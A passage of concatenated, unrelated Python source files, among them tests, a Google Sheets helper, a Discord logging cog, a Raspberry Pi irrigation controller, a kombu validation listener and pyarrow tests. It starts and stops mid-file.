    # Just roll data for subsequent calls
    getFrame.count +=1
    return getFrame.z


# Static state for getFrame()
getFrame.count = 0
getFrame.z = None
# Main display loop: render/advance the frame and show it with OpenCV.
while True:
    # Get a numpy array to display from the simulation
    npimage = getFrame()
    # NOTE(review): cv2.imshow interprets float images as 0.0-1.0; the
    # in-set colour's blue channel is ITERATIONS/255.0 (~3.9) and will clip.
    cv2.imshow('image', npimage)
    cv2.waitKey(1)
|
import shutil
import pytest
from mason.api.get import get
from mason.api.apply import apply
from mason.definitions import from_root
from mason.test.support import testing_base as base
from os import path, mkdir
class TestGetConfiguration:
    """API tests for `get("config", ...)` against the bundled test configs."""

    def test_config_exists(self):
        # Fetching config id '5' returns the single matching config
        env = base.get_env("/test/support/", "/test/support/validations/")
        response, status = get("config", '5', env=env)
        expects = [{'current': False,
            'execution_client': [],
            'id': '5',
            'metastore_client': [{'name': 'test'}],
            'scheduler_client': [],
            'storage_client': []}]
        assert(response['Configs'] == expects)
        assert(status == 200)

    def test_config_malformed(self):
        # A non-numeric-looking but invalid id yields a 400 with a
        # "Malformed resource" error prefix
        env = base.get_env("/test/support/", "/test/support/validations/")
        base.set_log_level()
        response, status = get("config", "0", log_level="fatal", env=env)
        assert(response['Errors'][0][0:18] == "Malformed resource")
        assert(status == 400)

    def test_config_dne(self):
        # A well-formed id with no matching config yields a 404
        env = base.get_env("/test/support/", "/test/support/validations/")
        base.set_log_level()
        response, status = get("config", 'monkeys', log_level="fatal", env=env)
        expects = {'Errors': ['No config matching monkeys. Register new resources with \'mason apply\'']}
        assert(response == expects)
        assert(status == 404)
class TestApplyConfig:
    """API tests for `apply(...)`, run inside a throwaway /.tmp/ workspace."""

    @pytest.fixture(autouse=True)
    def run_around_tests(self):
        # Create /.tmp/ before each test and remove it afterwards
        tmp_folder = from_root("/.tmp/")
        if not path.exists(tmp_folder):
            mkdir(tmp_folder)
        yield
        if path.exists(tmp_folder):
            shutil.rmtree(tmp_folder)

    def test_good_configs(self):
        env = base.get_env("/.tmp/", "/test/support/validations/")
        response, status = apply(from_root("/test/support/"), env=env, log_level="fatal")
        # Counts are pinned to the fixtures bundled under /test/support/
        assert(len(response["Info"]) == 20)
        assert(len(response["Errors"]) == 8)
        assert(status == 200)
        response, status = get("config", env=env, log_level="fatal")
        assert(len(response["Configs"]) == 4)

    def test_overwrite(self):
        # TODO: not yet implemented
        pass
|
from datetime import datetime
from os import environ
from json import loads
from authlib.client import AssertionSession
import gspread
"""
gspread:
https://youtu.be/vISRn5qFrkM
https://github.com/burnash/gspread
https://developers.google.com/sheets/api/reference/rest/v4/ValueInputOption
oauth issues:
https://github.com/google/oauth2client/issues/735
https://www.reddit.com/r/learnpython/comments/8elu5a/google_sheets_api_dilemma_googleauth_and_gspread/
https://github.com/burnash/gspread/issues/529
oauth solution:
https://www.reddit.com/r/Python/comments/8kzra5/how_to_use_gspread_without_oauth2client/?st=JHG7OFKZ&sh=051ca8af
https://blog.authlib.org/2018/authlib-for-gspread
"""
def create_assertion_session(scopes, subject=None):
    """Build an authlib AssertionSession from the Google service-account
    JSON stored in the GOOGLE_CLIENT_SECRET environment variable."""
    conf = loads(environ['GOOGLE_CLIENT_SECRET'])
    token_url = conf['token_uri']
    header = {'alg': 'RS256'}
    key_id = conf.get('private_key_id')
    if key_id:
        header['kid'] = key_id
    # Google puts scope in payload
    claims = {'scope': ' '.join(scopes)}
    return AssertionSession(
        grant_type=AssertionSession.JWT_BEARER_GRANT_TYPE,
        token_url=token_url,
        issuer=conf['client_email'],
        audience=token_url,
        claims=claims,
        subject=subject,
        key=conf['private_key'],
        header=header,
    )
def append_google_sheet(profile_dict, msg):
    """Append one row (timestamp, profile fields, msg) to the first
    worksheet of the spreadsheet named by GOOGLE_SHEET_NAME."""
    scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']
    client = gspread.Client(None, create_assertion_session(scope))
    sheet = client.open(environ['GOOGLE_SHEET_NAME']).sheet1
    row = [
        str(datetime.now()),
        profile_dict['display_name'],
        profile_dict['picture_url'],
        profile_dict['status_message'],
        profile_dict['user_id'],
        msg,
    ]
    sheet.append_row(values=row, value_input_option='USER_ENTERED')
# Manual smoke test: append a dummy profile row when run directly.
if __name__ == '__main__':
    profile_dict = {
        'display_name': 'test_name',
        'picture_url': 'https://www.google.com',
        'status_message': 'testing',
        'user_id': '123'
    }
    append_google_sheet(profile_dict, 'apple')
|
import string
from dataclasses import dataclass
from multiprocessing import Queue
from random import getrandbits, randrange
@dataclass
class RawMsg:
    """A raw message routed between simulated network nodes."""
    msg_id: int        # unique id issued by Supervisor.unique_id()
    destination: int   # destination node port
    # Annotation fixed: this was `string` (the stdlib *module*, not a type).
    # dataclasses ignore the annotation's value, so behavior is unchanged,
    # but `str` is what static checkers and readers expect.
    msg: str
class Supervisor:
    """Creates message-delivery tasks for simulated nodes and tallies the
    delivery results reported back on a shared response queue."""

    def __init__(self, msg_count, node_count):
        self.task_list = []               # ids of every message handed out
        self.response_queue = Queue()     # delivered msg ids come back here
        self.unique_sequence = self.unique_id()
        self.queue_list = []              # [port, task_queue] per known node
        self.msg_count = msg_count        # messages generated per node
        self.node_count = node_count      # number of simulated nodes
        self.netModules = dict()

    @staticmethod
    def unique_id():
        """Yield consecutive ids starting from a random 8-bit seed."""
        next_id = getrandbits(8)
        while True:
            yield next_id
            next_id += 1

    def generate_task(self, port, tasks, new_node = True):
        """Put msg_count randomly-addressed messages on *tasks* for *port*,
        registering the (port, queue) pair when *new_node* is true."""
        for i in range(self.msg_count):
            msg = RawMsg(0, 0, "")
            msg.destination = self.generate_dest_port(port)
            msg.msg = f'Hi from {port} to {msg.destination}, have a nice day: {i}'
            msg.msg_id = next(self.unique_sequence)
            self.task_list.append(msg.msg_id)
            tasks.put(msg)
        if new_node:
            self.queue_list.append([port, tasks])

    def generate_dest_port(self, port, base_port=5000):
        """Pick a random port in [base_port, base_port + node_count) that
        differs from *port*."""
        while True:
            candidate = base_port + randrange(self.node_count)
            if candidate != port:
                return candidate

    def get_results(self):
        """Drain the response queue and report how many issued ids came back."""
        delivered = 0
        for _ in range(self.response_queue.qsize()):
            if self.response_queue.get() in self.task_list:
                delivered = delivered + 1
        print(f'Msg delivered: {delivered} / {len(self.task_list)} ')

    def generate_new_tasks(self):
        """Re-issue a fresh batch of tasks to every already-registered node."""
        for port, tasks in self.queue_list:
            self.generate_task(port, tasks, False)
|
import math
def shell():
    """Interactive prompt: print pi truncated to a requested number of
    decimal places (max 15); 'q' or 'quit' exits."""
    print("This piece of software shows Pi to a user definded decimal. (max 15)")
    while True:
        print('>>> ', end='')
        entry = input()
        if entry in ("quit", "q"):
            return
        if not entry.isdigit():
            print("Thats not a Number. Please try again")
            continue
        digits = int(entry)
        if digits <= 15:
            # "3." plus the requested number of decimal digits
            print(str(math.pi)[0:digits + 2])
        else:
            print(math.pi, "| 15 is the max of after decimals")
# Start the interactive prompt when run as a script.
if __name__ == '__main__':
    shell()
|
"""
MIT License
Copyright (c) 2020 GamingGeek
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from discord.ext import commands
import functools
import traceback
import datetime
import discord
import aiohttp
import json
class CommandCompletion(commands.Cog):
    """Logs completions of watched commands (currently only `purge`) to the
    guild's configured action-log channel."""

    def __init__(self, bot):
        self.bot = bot
        # Command names whose completion should be logged
        self.watchedcmds = ['purge']

    @commands.Cog.listener()
    async def on_command_completion(self, ctx):
        """Build and send an embed describing the completed command."""
        if ctx.command.name in self.watchedcmds:
            if ctx.guild:
                # Action-log channel, if one is configured for this guild
                logch = self.bot.configs[ctx.guild.id].get('log.action')
                if logch:
                    embed = discord.Embed(color=ctx.author.color, timestamp=datetime.datetime.utcnow(), description=f'`{ctx.command.name}` **was used in** {ctx.channel.mention} **by {ctx.author.name}**')
                    embed.set_author(name=ctx.author, icon_url=str(ctx.author.avatar_url_as(static_format='png', size=2048)))
                    embed.add_field(name='Message', value=ctx.message.system_content, inline=False)
                    embed.set_footer(text=f"Author ID: {ctx.author.id} | Channel ID: {ctx.channel.id}")
                    if ctx.command.name == 'purge':
                        purged = None
                        reason = 'No Reason Provided'
                        try:
                            # recentpurge is presumably populated by the
                            # purge command itself -- confirm against that cog
                            purged = self.bot.recentpurge[ctx.channel.id]
                            reason = self.bot.recentpurge.get(f'{ctx.channel.id}-reason', 'No Reason Provided')
                            self.bot.recentpurge[f'{ctx.channel.id}-reason'] = None
                            embed.add_field(name='Reason', value=reason, inline=False)
                            # Strip the --reason flag from the logged message
                            embed.set_field_at(0, name='Message', value=ctx.message.system_content.replace(f'--reason {reason}', ''), inline=False)
                        except KeyError as e:
                            # No purge data recorded for this channel
                            pass
                        if purged:
                            try:
                                embed.add_field(
                                    name='Purged Messages',
                                    value=(await self.bot.haste(json.dumps(self.bot.recentpurge[ctx.channel.id], indent=4))),
                                    inline=False
                                )
                            except Exception:
                                embed.add_field(name='Purged Messages', value='Failed to upload messages to hastebin', inline=False)
                    try:
                        await logch.send(embed=embed)
                    except Exception:
                        # Sending is best-effort (missing permissions etc.)
                        pass
def setup(bot):
    """Cog entry point invoked by discord.py's extension loader; registers
    the CommandCompletion cog and logs success or failure."""
    try:
        bot.add_cog(CommandCompletion(bot))
        bot.logger.info(f'$GREENLoaded event $CYANCommandCompletion!')
    except Exception as e:
        # errortb = ''.join(traceback.format_exception(type(e), e, e.__traceback__))
        bot.logger.error(f'$REDError while adding event $CYAN"CommandCompletion"', exc_info=e)
|
# -*- coding: utf-8 -*-
"""
Zentrales Skript für die Bewässerungssteuerung mit den Funktionen
main()
bewaesserungsablauf()
shutdown()
main() führt Initialisierungen durch und entscheidet ob der normale Bewässerungsablauf ausgeführt werden soll oder in den Wartungsmodus verzweigt wird
Der bewaesserungsablauf() führt die Messungen durch und speichert die Werte in der JSON-Datenstruktur. Dann prüft er ob die Voraussetzungen für eine Bewässerung vorliegen und startet ggf. die Bewässerungsroutine. Schließlich wird noch die JSON-Datenstruktur sowie die Konfigurationsdatei gespeichert und der nächste Startzeitpunkt bestimmt und in die RTC geschrieben
shutdown() setzt den Alarmausgang SQW der Realtime Clock zurück (damit beginnt die Entladung des Kondensators, was zum Abschalten der Versorgungsspannung führt) und startet den Shutdown des Raspi
"""
import time
import datetime as dt
import logging
import os
import sys
import subprocess as sp
from RPi import GPIO
import rtc_tools as rt
import reservoir as res
import bewaesserung_lib as lib
import bewaesserung_rlib as rlib
# Shutdown delay in minutes when maintenance mode is active (see main())
MIN_DELAY_SHUTDOWN = 5
ZIELLEVEL = 2 # target fill level for the reservoir
# SSID whose presence triggers maintenance mode (see main())
MOBILER_HOTSPOT = "MOBSPOT"
# Initialize the root logger: INFO level, mirrored to a log file and stderr
logger = logging.getLogger()
logger.setLevel(logging.INFO)
fH = logging.FileHandler("/home/pi/bewaesserung.log")
fH.setLevel(logging.INFO)
cH = logging.StreamHandler()
cH.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fH.setFormatter(formatter)
cH.setFormatter(formatter)
logger.addHandler(fH)
logger.addHandler(cH)
#################################################################################################################################################
def shutdown():
    """Reset the realtime clock's SQW alarm output (this starts discharging
    the capacitor, which eventually cuts the supply voltage) and shut down
    the Raspberry Pi.

    Parameters: none.
    """
    GPIO.cleanup()
    logger.info("Shutdown beginnt")
    # The reset must happen immediately before the shutdown, because it
    # drives the RTC output SQW back to 1
    rt.reset_alarm1_indicator(rlib.get_rtClock())
    os.system("sudo shutdown now")
def bewaesserungsablauf(rtClock, mcp, cfgData, data, dt):
    """Run one irrigation cycle.

    Performs the measurements and stores the values in the JSON data
    structure, then checks whether the preconditions for irrigation are met
    and, if so, runs the irrigation routine. Finally the JSON data and the
    configuration are saved and the next start time is programmed into the
    RTC.

    Parameters:
        rtClock: RTC object instance
        mcp:     MCP3008 instance (analog-digital converter)
        cfgData: configuration dict (activation flag, allowed hours,
                 moisture threshold, no-water counter)
        data:    JSON data object for the measurements
        dt:      datetime object with the start timestamp.
                 NOTE(review): this parameter shadows the module alias
                 `datetime as dt` inside this function.
    """
    rlib.sensordaten_auslesen(rtClock, mcp, data)
    # Irrigation logic starts here
    if cfgData['Bewaesserung_aktiv']:
        if dt.hour in cfgData['Bewaesserungsstunden']:
            bf = rlib.bodenfeuchtigkeit_messen(mcp)
            # Per the log message below, readings at/below the threshold
            # mean the soil is already moist enough
            if bf[0] > cfgData['Grenzwert_Bodenfeuchtigkeit']:
                # Give up after repeated attempts without available water
                if cfgData['Anzahl_kein_Wasser'] <= 2:
                    logger.info("Bewässerung kann starten")
                    r = res.Reservoir(18,0,1,2,15)
                    ret = r.fuelleBisLevel(ZIELLEVEL)
                    if ret==ZIELLEVEL:
                        logger.info("Reservoir konnte auf Ziellevel {:} gefüllt werden".format(ZIELLEVEL))
                        cfgData['Anzahl_kein_Wasser'] = 0
                    else:
                        logger.info("Füllung Reservoir nur bis Level {:} statt {:} möglich".format(ret, ZIELLEVEL))
                        cfgData['Anzahl_kein_Wasser'] = cfgData['Anzahl_kein_Wasser'] + 1
                    logger.info("Wert von Anzahl_kein_Wasser: {:}".format(cfgData['Anzahl_kein_Wasser']))
                else:
                    logger.info("Abbruch da bei den letzten beiden Versuchen kein Wasser verfügbar war")
            else:
                logger.info("Abbruch Bodensensor zeigt genügend Feuchtigkeit an ({:}/Grenzwert {:})".format(bf[0], cfgData['Grenzwert_Bodenfeuchtigkeit']))
        else:
            logger.info("keine Uhrzeit für Bewässerung")
    else:
        logger.info("Bewässerung ist nicht aktiviert")
    # Now save the data and program the RTC with the next start time
    lib.save_json(cfgData, data)
    rlib.naechsten_start_bestimmen(rtClock)
def main():
    """Initialize the RTC and the attached sensors, then either run the
    normal irrigation cycle or drop into maintenance mode.

    Maintenance mode applies when the delay pin is pulled to ground or the
    known mobile hotspot is reachable: the irrigation run is skipped and the
    shutdown is delayed by MIN_DELAY_SHUTDOWN minutes so an operator can
    connect to the Pi. The command line argument "ignore" forces the normal
    cycle even when the hotspot is found.

    Parameters: none.
    """
    try:
        # Initialize the MCP3008 analog-digital converter and the RTC
        mcp = rlib.get_mcp()
        rtClock = rlib.get_rtClock()
        # After booting, seed the Pi's clock from the RTC's date/time
        dt = rtClock.read_datetime()
        sp.run(["sudo", "date", "--set", dt.strftime("%Y-%m-%d %H:%M:%S")])
        logger.info("Starte Main")
        # Read configuration and measurement data from their JSON files
        cfgData = lib.read_json_cfg()
        data = lib.read_json_data(cfgData)
        rlib.set_gpio_settings()
        # Check whether pin PIN_DELAY_SHUTDOWN is pulled to 0
        delayPin = GPIO.input(rlib.PIN_DELAY_SHUTDOWN)
        logger.info("Prüfung Pin {:}, Ergebnis: {:}".format(rlib.PIN_DELAY_SHUTDOWN, delayPin))
        hotspot_found = rlib.check_hotspot(MOBILER_HOTSPOT)
        logger.info("Prüfung auf Hotspot " + MOBILER_HOTSPOT + ". Ergebnis: {:}".format(hotspot_found))
        # If the phone's hotspot is reachable or delayPin is 0, the operator
        # wants to connect to the Pi instead of running the usual program
        if (delayPin==0 or hotspot_found) and not (len(sys.argv)>1 and sys.argv[1]=="ignore"):
            logger.info("Breche Programm ab, Shutdown verzoegert da mit mobilem Hotspot " + MOBILER_HOTSPOT + " verbunden oder DelayPin auf 0")
        else:
            logger.info("Starte Bewässerungsablauf")
            bewaesserungsablauf(rtClock, mcp, cfgData, data, dt)
        # Delay the shutdown when PIN_DELAY_SHUTDOWN is grounded (default is
        # pull-up) or the hotspot was found
        if delayPin==0 or hotspot_found:
            logger.info("Shutdown wird verzoegert um {:} min".format(MIN_DELAY_SHUTDOWN))
            time.sleep(MIN_DELAY_SHUTDOWN*60)
        # NOTE(review): the measured battery voltage is discarded --
        # presumably the call logs or stores it internally; confirm.
        u_bat=rlib.batteriespannung_messen(mcp)
        shutdown()
    except Exception:
        # Narrowed from a bare "except:" so KeyboardInterrupt/SystemExit are
        # not swallowed. Any other failure is logged and shutdown() is
        # skipped, leaving the Pi running for debugging.
        logger.exception("Exception in main")
# Main program loop.
# Entry point: run one measurement/irrigation cycle, then shut down.
if __name__ == '__main__':
    main()
|
# -*- coding: utf-8 -*-
"""Runs graph validation tests in the specified folder."""
import logging
from kombu import Connection, Exchange, Queue
from kombu.mixins import ConsumerMixin
from ..hydrators.ingest_hydrator import IngestHydrator
from .test_action import TestAction
from .common import load_test_queries
from ..config import Config
class ValidationHandler():
    """Hydrates the graph for one submission, then runs the test suite on it."""

    def __init__(self, subid, graph, test_path):
        self._subid = subid          # submission envelope uuid
        self._graph = graph          # target graph instance
        self._test_path = test_path  # folder containing the test queries

    def run(self):
        """Hydrate the graph and execute the tests; returns the test result."""
        hydrator = IngestHydrator(self._graph, self._subid)
        hydrator.hydrate()
        action = TestAction(self._graph, self._test_path, False)
        return action.run()
class ValidationListener(ConsumerMixin):
    """Kombu consumer that runs graph validation for each AMQP message."""

    def __init__(self, connection, validation_queue, graph, test_path):
        self.connection = connection  # public attribute required by ConsumerMixin
        self.validation_queue = validation_queue
        self._graph = graph
        self._test_path = test_path
        self._logger = logging.getLogger(__name__)

    def get_consumers(self, Consumer, channel):
        """ConsumerMixin hook: a single consumer on the validation queue."""
        return [Consumer(queues=self.validation_queue, accept=["json"], on_message=self.handle_message, prefetch_count=10)]

    def handle_message(self, message):
        """Validate the submission named in the message, then ack it.

        NOTE(review): the message is acked even when validation_result is
        None -- confirm whether failed runs should be requeued instead.
        """
        subid = message.payload['submissionEnvelopeUuid']
        self._logger.info(f"received validation request for {subid}")
        validation_result = ValidationHandler(subid, self._graph, self._test_path).run()
        if validation_result is not None:
            self._logger.info(f"validation finished for {subid}")
            self._logger.debug(f"result: {validation_result}")
        message.ack()
class IngestValidatorAction:
    """Long-running action: consume validation requests from AMQP and run
    graph validation tests for each submission."""

    def __init__(self, graph, test_path, connection, exchange_name, queue_name, routing_key):
        self._graph = graph
        self._test_path = test_path
        # NOTE(review): this connection is never used -- run() opens its own
        # via Config['AMQP_CONNECTION']; confirm which is intended.
        self._connection = connection
        self._exchange_name = exchange_name
        self._queue_name = queue_name
        self._routing_key = routing_key
        self._test_queries = {}
        """Test query dict. Keys are test file names, values are cypher queries"""
        self._logger = logging.getLogger(__name__)

    def run(self):
        """Load the test queries, declare the exchange/queue, and listen for
        messages until interrupted (KeyboardInterrupt stops cleanly)."""
        self._logger.info("loading tests")
        self._test_queries = load_test_queries(self._test_path)
        self._logger.info(f"loaded [{len(self._test_queries)}] test queries")
        validation_exchange = Exchange(self._exchange_name, type='direct')
        validation_queue = Queue(self._queue_name, validation_exchange, routing_key=self._routing_key)
        with Connection(Config['AMQP_CONNECTION']) as conn:
            self._logger.info(f"listening for messages at {conn}")
            try:
                ValidationListener(conn, validation_queue, self._graph, self._test_path).run()
            except KeyboardInterrupt:
                self._logger.info("AMQP listener stopped")
|
from pydantic import BaseModel, validator
from tracardi.domain.named_entity import NamedEntity
class PushOverAuth(BaseModel):
    """Credentials for the Pushover notification service."""
    token: str  # application API token
    user: str  # user (or group) key the notification is sent to
class PushOverConfiguration(BaseModel):
    """Plugin configuration: the Pushover resource to use and the message to send."""

    source: NamedEntity
    message: str

    @validator("message")
    def message_not_empty(cls, value):
        # Renamed from `name_not_empty`: the validator checks `message`, not a
        # name field — the old name was a copy-paste leftover.
        if len(value) == 0:
            raise ValueError("message can not be empty.")
        return value
|
import os
import json
import datasets
"""Summscreen dataset."""
_CITATION = """
@article{DBLP:journals/corr/abs-2104-07091,
author = {Mingda Chen and
Zewei Chu and
Sam Wiseman and
Kevin Gimpel},
title = {SummScreen: {A} Dataset for Abstractive Screenplay Summarization},
journal = {CoRR},
volume = {abs/2104.07091},
year = {2021},
url = {https://arxiv.org/abs/2104.07091},
archivePrefix = {arXiv},
eprint = {2104.07091},
timestamp = {Mon, 19 Apr 2021 16:45:47 +0200},
biburl = {https://dblp.org/rec/journals/corr/abs-2104-07091.bib},
bibsource = {dblp computer science bibliography, https://dblp.org}
}
"""
_DESCRIPTION = """
A summary of scientific papers should ideally incorporate the impact of the papers on the research community
reflected by citations. To facilitate research in citation-aware scientific paper summarization (Scisumm),
the CL-Scisumm shared task has been organized since 2014 for papers in the computational linguistics and NLP domain.
"""
_HOMEPAGE = "https://github.com/mingdachen/SummScreen"
_LICENSE = "MIT Licencse"
_URLs = "https://drive.google.com/uc?id=1BvdIllGBo9d2-bzXQRzWuJXB04XPVmfF"
class SummertimeSummscreen(datasets.GeneratorBasedBuilder):
    """Summscreen dataset."""
    VERSION = datasets.Version("1.1.0")
    BUILDER_CONFIGS = [
        datasets.BuilderConfig(),
    ]
    def _info(self):
        """Declare the example schema: an id, the transcript lines and the recap text."""
        features = datasets.Features(
            {
                "entry_number": datasets.Value("string"),
                "transcript": datasets.features.Sequence(datasets.Value("string")),
                "recap": datasets.Value("string"),
            }
        )
        return datasets.DatasetInfo(
            description=_DESCRIPTION,
            features=features,
            supervised_keys=None,
            homepage=_HOMEPAGE,
            license=_LICENSE,
            citation=_CITATION,
        )
    def _split_generators(self, dl_manager):
        """Returns SplitGenerators."""
        # Download the Google Drive archive once; each split reads two JSON-lines
        # files, one per sub-corpus (ForeverDreaming and TVMegaSite).
        my_urls = _URLs
        path = dl_manager.download_and_extract(my_urls)
        path = os.path.join(path, "SummScreen")
        trainpath_fd = os.path.join("ForeverDreaming", "fd_train.json")
        trainpath_tms = os.path.join("TVMegaSite", "tms_train.json")
        trainpaths = [trainpath_fd, trainpath_tms]
        devpath_fd = os.path.join("ForeverDreaming", "fd_dev.json")
        devpath_tms = os.path.join("TVMegaSite", "tms_dev.json")
        devpaths = [devpath_fd, devpath_tms]
        testpath_fd = os.path.join("ForeverDreaming", "fd_test.json")
        testpath_tms = os.path.join("TVMegaSite", "tms_test.json")
        testpaths = [testpath_fd, testpath_tms]
        return [
            datasets.SplitGenerator(
                name=datasets.Split.TRAIN,
                # These kwargs will be passed to _generate_examples
                gen_kwargs={"filepaths": (path, trainpaths), "split": "train"},
            ),
            datasets.SplitGenerator(
                name=datasets.Split.VALIDATION,
                # These kwargs will be passed to _generate_examples
                gen_kwargs={"filepaths": (path, devpaths), "split": "dev"},
            ),
            datasets.SplitGenerator(
                name=datasets.Split.TEST,
                # These kwargs will be passed to _generate_examples
                gen_kwargs={"filepaths": (path, testpaths), "split": "test"},
            ),
        ]
    def _generate_examples(self, filepaths, split):
        """Yields examples."""
        # Each input file is JSON-lines; "@@ " is a tokenization artifact that is
        # stripped before parsing. The example key is the source filename —
        # assumed unique across the two sub-corpora (TODO confirm).
        path, relative_filepaths = filepaths
        for filepath in relative_filepaths:
            extraction_path = os.path.join(path, filepath)
            with open(extraction_path, "r") as f:
                for line in f:
                    processed_line = line.replace("@@ ", "")
                    instance = json.loads(processed_line)
                    entry = {}
                    entry["entry_number"] = instance["filename"]
                    entry["transcript"] = instance["Transcript"]
                    entry["recap"] = instance["Recap"][
                        0
                    ]  # Recap is a single string in list
                    yield entry["entry_number"], entry
|
# ------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.
# ------------------------------------------------------------------------------------------
from InnerEyeDataQuality.configs.config_node import ConfigNode
# Default configuration tree for the data selector; callers get a mutable copy
# via get_default_selector_config().
config = ConfigNode()
# data selector
config.selector = ConfigNode()
config.selector.type = None
config.selector.model_name = None
config.selector.model_config_path = None
config.selector.use_active_relabelling = False
# Other selector parameters (unused)
config.selector.training_dynamics_data_path = None
config.selector.burnout_period = 0
config.selector.number_samples_to_relabel = 10
# output files
config.selector.output_directory = None
# tensorboard
config.tensorboard = ConfigNode()
config.tensorboard.save_events = False
def get_default_selector_config() -> ConfigNode:
    """Return a clone of the default selector config so callers can mutate it freely."""
    return config.clone()
|
import os
import tempfile
# Scratch directory used by slackviewer, placed under the system temp dir.
SLACKVIEWER_TEMP_PATH = os.path.join(tempfile.gettempdir(), "_slackviewer")
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import subprocess
import pytest
import pyarrow as pa
def test_get_include():
    """pa.get_include() must point at a directory that contains arrow/api.h."""
    header = os.path.join(pa.get_include(), 'arrow', 'api.h')
    assert os.path.exists(header)
# Windows-only: at least one library dir must contain the arrow import library.
@pytest.mark.skipif('sys.platform != "win32"')
def test_get_library_dirs_win32():
    assert any(os.path.exists(os.path.join(directory, 'arrow.lib'))
               for directory in pa.get_library_dirs())
def test_cpu_count():
    """set_cpu_count round-trips; the original value is restored afterwards."""
    original = pa.cpu_count()
    assert original > 0
    try:
        pa.set_cpu_count(original + 5)
        assert pa.cpu_count() == original + 5
    finally:
        pa.set_cpu_count(original)
def test_build_info():
    """Smoke-check the types of the build/version metadata exposed by pyarrow."""
    assert isinstance(pa.cpp_build_info, pa.BuildInfo)
    assert isinstance(pa.cpp_version_info, pa.VersionInfo)
    assert isinstance(pa.cpp_version, str)
    assert isinstance(pa.__version__, str)
    assert pa.cpp_build_info.version_info == pa.cpp_version_info
    # assert pa.version == pa.__version__  # XXX currently false
def test_runtime_info():
    """Check runtime SIMD info and that ARROW_USER_SIMD_LEVEL=none is honoured
    by a freshly spawned interpreter."""
    import sys

    info = pa.runtime_info()
    assert isinstance(info, pa.RuntimeInfo)
    possible_simd_levels = ('none', 'sse4_2', 'avx', 'avx2', 'avx512')
    assert info.simd_level in possible_simd_levels
    assert info.detected_simd_level in possible_simd_levels

    if info.simd_level != 'none':
        env = os.environ.copy()
        env['ARROW_USER_SIMD_LEVEL'] = 'none'
        # Note: no stray "f" before the interpolation — the old template
        # generated `== f'avx2'` (an accidental f-string literal) in the child.
        code = f"""if 1:
            import pyarrow as pa

            info = pa.runtime_info()
            assert info.simd_level == 'none', info.simd_level
            assert info.detected_simd_level == {info.detected_simd_level!r},\
                info.detected_simd_level
            """
        # Spawn the same interpreter running this test, not whatever "python"
        # happens to be on PATH (which may be a different installation).
        subprocess.check_call([sys.executable, "-c", code], env=env)
# Every extension class exported by pyarrow must refuse direct construction
# and direct the user to its factory function instead.
@pytest.mark.parametrize('klass', [
    pa.Field,
    pa.Schema,
    pa.ChunkedArray,
    pa.RecordBatch,
    pa.Table,
    pa.Buffer,
    pa.Array,
    pa.Tensor,
    pa.DataType,
    pa.ListType,
    pa.LargeListType,
    pa.FixedSizeListType,
    pa.UnionType,
    pa.SparseUnionType,
    pa.DenseUnionType,
    pa.StructType,
    pa.Time32Type,
    pa.Time64Type,
    pa.TimestampType,
    pa.Decimal128Type,
    pa.Decimal256Type,
    pa.DictionaryType,
    pa.FixedSizeBinaryType,
    pa.NullArray,
    pa.NumericArray,
    pa.IntegerArray,
    pa.FloatingPointArray,
    pa.BooleanArray,
    pa.Int8Array,
    pa.Int16Array,
    pa.Int32Array,
    pa.Int64Array,
    pa.UInt8Array,
    pa.UInt16Array,
    pa.UInt32Array,
    pa.UInt64Array,
    pa.ListArray,
    pa.LargeListArray,
    pa.MapArray,
    pa.FixedSizeListArray,
    pa.UnionArray,
    pa.BinaryArray,
    pa.StringArray,
    pa.FixedSizeBinaryArray,
    pa.DictionaryArray,
    pa.Date32Array,
    pa.Date64Array,
    pa.TimestampArray,
    pa.Time32Array,
    pa.Time64Array,
    pa.DurationArray,
    pa.Decimal128Array,
    pa.Decimal256Array,
    pa.StructArray,
    pa.Scalar,
    pa.BooleanScalar,
    pa.Int8Scalar,
    pa.Int16Scalar,
    pa.Int32Scalar,
    pa.Int64Scalar,
    pa.UInt8Scalar,
    pa.UInt16Scalar,
    pa.UInt32Scalar,
    pa.UInt64Scalar,
    pa.HalfFloatScalar,
    pa.FloatScalar,
    pa.DoubleScalar,
    pa.Decimal128Scalar,
    pa.Decimal256Scalar,
    pa.Date32Scalar,
    pa.Date64Scalar,
    pa.Time32Scalar,
    pa.Time64Scalar,
    pa.TimestampScalar,
    pa.DurationScalar,
    pa.StringScalar,
    pa.BinaryScalar,
    pa.FixedSizeBinaryScalar,
    pa.ListScalar,
    pa.LargeListScalar,
    pa.MapScalar,
    pa.FixedSizeListScalar,
    pa.UnionScalar,
    pa.StructScalar,
    pa.DictionaryScalar,
    pa.ipc.Message,
    pa.ipc.MessageReader,
    pa.MemoryPool,
    pa.LoggingMemoryPool,
    pa.ProxyMemoryPool,
])
def test_extension_type_constructor_errors(klass):
    # ARROW-2638: prevent calling extension class constructors directly
